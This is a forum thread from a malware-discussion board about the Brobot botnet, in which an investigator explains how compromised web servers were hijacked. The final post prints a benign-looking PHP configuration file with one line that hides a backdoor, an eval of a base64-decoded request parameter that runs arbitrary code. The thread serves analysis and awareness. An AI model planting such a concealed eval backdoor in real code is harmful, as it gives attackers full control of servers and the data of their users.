Brobot

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

Brobot

Postby spamislame » Thu May 02, 2013 5:58 pm

Hi

Has anybody hear heard about this?

Anybody interested in what it does? :) I had a really interesting few weeks investigating a client's hijacked server. Nobody's written anything detailed publicly about this exploit and it's been interesting discovering how it all works.

Will post more hopefully very soon but wondered if anyone has already heard of this.

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Brobot

Postby Red Dwarf » Fri May 03, 2013 3:59 am

According to an FBI report it is "the botnet used by the hacktivist group Izz ad-Din al-Qassam Cyber Fighters"

An update (April 2013) from the FBI noted some additional scripts in Brobot

More background on the bank attacks at this blog
http://blogs.csoonline.com/malwarecyber ... resilience
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10487
Joined: Tue Jun 27, 2006 2:01 am

Re: Brobot

Postby NotBuyingIt » Fri May 03, 2013 12:52 pm

NotBuyingIt
Spammer Killing Machine
 
Posts: 611
Joined: Sun Jun 13, 2010 5:22 pm

Re: Brobot

Postby spamislame » Sun May 05, 2013 10:35 am

Hello at last.

I have a week off - staycation - during which I'm mostly just relaxing, organizing my apartment, doing social things, etc. So I'll be in and out.

Sadly: I left all my brobot research at work, so I will paraphrase my evidence.

The "brobot" botnet is really a collection of really stupidly configured websites operated by ISP's who do not put security in a very high priority.

The ISP who was hosting the compromised server I was asked to investigate wasn't performing any logging since that "ate up a lot of disk space" and they're running the "zeus" web server - not to be confused with the "zeus" malware.

Nutshell: Brobot consists of really non-secure web servers that allow a PHP script to execute pretty much ANY command a user wants it to execute.

Those commands include:

- Stop logging any errors.
- Allow my script to run indefinitely
- Allow my script to attempt to upload or check the status of malicious files on several dozen external web servers that I believe are similarly insecure.

That's bad.

The example I found uses a fairly benign file that looks like it's just setting a bunch of global parameters and not much else. But tucked away inside that is a single line that executes an "eval" of a base-64 decoded parameter.

That parameter can contain any PHP command, and does indeed include the above two examples. It's an extremely dangerous file but it doesn't look like it is because it's filled with so much simple, routine functionality.

The bigger problem is: when I found this out, and when I was able to put in some extra logging to determine this, I contacted the 30 most commonly implemented external hosting companies. Most of them replied with "our server isn't infected. You don't know what you're talking about." They didn't even look into any of what I was telling them. They didn't disallow really majorly bad commands from continuing to be run on their servers, and in many cases they felt it was a burden to start logging anything.

The Brobot Botnet is not this "highly organized" criminal organization. Any one of you could choose a server and get it to do whatever you want. That doesn't mean you're now part of an organized criminal operation.

The media is doing a terrible job of reporting about this exploit, and worse than that: all security firms are only treating brobot as if it were a desktop infection, completely ignoring the fact that it can run on servers.

I'll post examples of what I found most likely next week. If I can find anything sooner I will post that too.

fyi

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Brobot

Postby MysteryFCM » Wed Jan 08, 2014 9:03 pm

Any chance you managed to get a copy of the files for this please?
MysteryFCM
Getting started
 
Posts: 23
Joined: Wed Jul 25, 2012 7:29 pm

Re: Brobot

Postby spamislame » Mon Jan 13, 2014 6:28 pm

Hi

In a way, yes I did.

The files are not that obscure.

All that the hackers did was exploit obvious holes in php and apache (very old versions) and were able to force a php file onto the server. It seems pretty innocuous on the surface. Can you guess which line is the real culprit for this "infection"?

Code: Select all
<?PHP
define('REAL_SERVER_ROOT', 'SERVER');
//DIR
define('SERVER_ROOT', '.');
define('SERVER_VERSION', '2.5');
define('BOOT_DIR', 'bootstrap');
define('SYSTEM_DIR', 'system');
define('SYSTEM_CONF_DIR', 'conf');
define('SYSTEM_CONF_PATH', SERVER_ROOT . '/' . SYSTEM_DIR . '/' . SYSTEM_CONF_DIR);
define('KERNEL_DIR', 'kernel');
define('SERVICES_DIR', 'services');
define('LIBRARIES_DIR', 'libs');
define('FRAMEWORKS_DIR', 'Frameworks');
define('IMPLEMENTATIONS_DIR', 'implementations');
define('EXTERN_DIR', 'extern');
//APP
define('APPS_DIR', 'apps');
define('USERS_DIR', 'users');
define('USERS_PATH', SERVER_ROOT . '/' . USERS_DIR);
define('USERS_CONF_DIR', 'conf');
define('USERS_FILES_DIR', 'files');
define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['c_id'])) : define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);
define('USERS_SHARE_DIR', 'share');
define('USERS_META_DIR', 'meta');
define('USERS_META_SETTINGS_FILENAME', 'settings.xml');
define('WORKGROUPS_DIR', 'workgroups');
define('WORKGROUPS_PATH', SERVER_ROOT . '/' . WORKGROUPS_DIR);
//CONF
define('WORKGROUPS_CONF_DIR', 'conf');
define('WORKGROUPS_FILES_DIR', 'files');
define('WORKGROUPS_METAFILES_DIR', 'metafiles');
define('WORKGROUPS_META_DIR', 'meta');
define('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');
?>

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am


Return to Malware

Who is online

Users browsing this forum: No registered users and 1 guest

cron